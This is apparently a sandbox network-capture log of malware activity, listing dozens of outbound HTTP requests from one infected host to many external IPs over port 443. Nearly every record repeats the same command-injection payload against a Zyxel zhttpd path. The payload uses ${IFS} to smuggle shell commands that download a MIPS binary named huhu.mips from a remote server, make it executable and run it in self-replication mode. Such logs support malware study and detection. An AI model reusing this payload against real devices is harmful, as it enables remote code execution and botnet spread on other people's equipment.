                                      Jan 19, 2024 17:29:20.544675112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1491192.168.2.145886031.10.239.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544698000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1492192.168.2.144840444.18.49.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544727087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1493192.168.2.143885219.123.38.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544778109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1494192.168.2.144433662.105.95.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544805050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1495192.168.2.1459532204.59.231.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544826984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1496192.168.2.143434014.254.65.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544871092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1497192.168.2.1434310134.201.96.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544949055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1498192.168.2.145862212.126.7.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.544977903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1499192.168.2.144146495.5.70.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545026064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1500192.168.2.1448012212.200.61.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545075893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1501192.168.2.143523871.220.132.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545113087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1502192.168.2.1445378115.158.180.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545135021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1503192.168.2.144778462.244.169.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545198917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1504192.168.2.144703251.83.194.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545238972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1505192.168.2.144795887.69.169.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545301914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1506192.168.2.144902819.70.40.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545357943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1507192.168.2.1438456187.111.244.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545378923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1508192.168.2.1459256194.23.105.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545448065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1509192.168.2.1446816174.150.68.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545495033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1510192.168.2.1455834131.231.130.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545551062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1511192.168.2.1453926209.145.136.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545588017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1512192.168.2.1434318100.247.203.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545610905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1513192.168.2.143856841.105.114.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545656919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1514192.168.2.1446278174.131.48.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545695066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1515192.168.2.1449150104.202.208.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545758963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1516192.168.2.144786462.197.254.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545810938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1517192.168.2.1448828177.244.10.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545845032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1518192.168.2.1437314183.28.189.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545897961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1519192.168.2.143913823.223.146.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545923948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1520192.168.2.1433218167.181.220.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.545949936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1521192.168.2.1443994219.125.204.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546000004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1522192.168.2.1435484211.233.196.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546044111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1523192.168.2.1435202101.56.31.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546068907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1524192.168.2.1450522119.201.9.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546094894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1525192.168.2.1450568146.170.99.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546135902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1526192.168.2.144842238.16.89.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546169043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1527192.168.2.1451504121.68.112.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546211004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1528192.168.2.1455474220.80.158.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546241045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1529192.168.2.1457270144.218.48.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546264887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1530192.168.2.1449852139.237.48.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546314001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1531192.168.2.1432914151.201.244.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546355963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1532192.168.2.1445972213.182.158.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546385050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1533192.168.2.1444986163.70.81.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546427011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1534192.168.2.145692661.45.80.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546494961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1535192.168.2.1440798105.70.120.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546495914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1536192.168.2.1457034187.192.211.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546528101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1537192.168.2.145945078.208.144.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546557903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1538192.168.2.1437438167.200.150.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546602964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1539192.168.2.143683490.250.81.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546646118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1540192.168.2.143571063.107.163.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546690941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1541192.168.2.1433292217.35.157.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546737909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1542192.168.2.1445434163.117.80.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546761990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1543192.168.2.145774083.34.207.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546835899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1544192.168.2.144818494.145.202.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546886921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1545192.168.2.1450322122.31.173.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546911001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1546192.168.2.143285836.42.158.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546982050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1547192.168.2.1438098177.200.192.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.546998978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1548192.168.2.1458180180.54.97.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547034025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1549192.168.2.1460208167.167.248.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547096968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1550192.168.2.1447048170.202.52.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547116995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1551192.168.2.1455644134.54.159.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547146082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1552192.168.2.144920284.190.156.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547183037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1553192.168.2.1457968197.231.46.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.547218084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1554192.168.2.1454360196.34.209.141443
                                      TimestampBytes transferredDirectionData
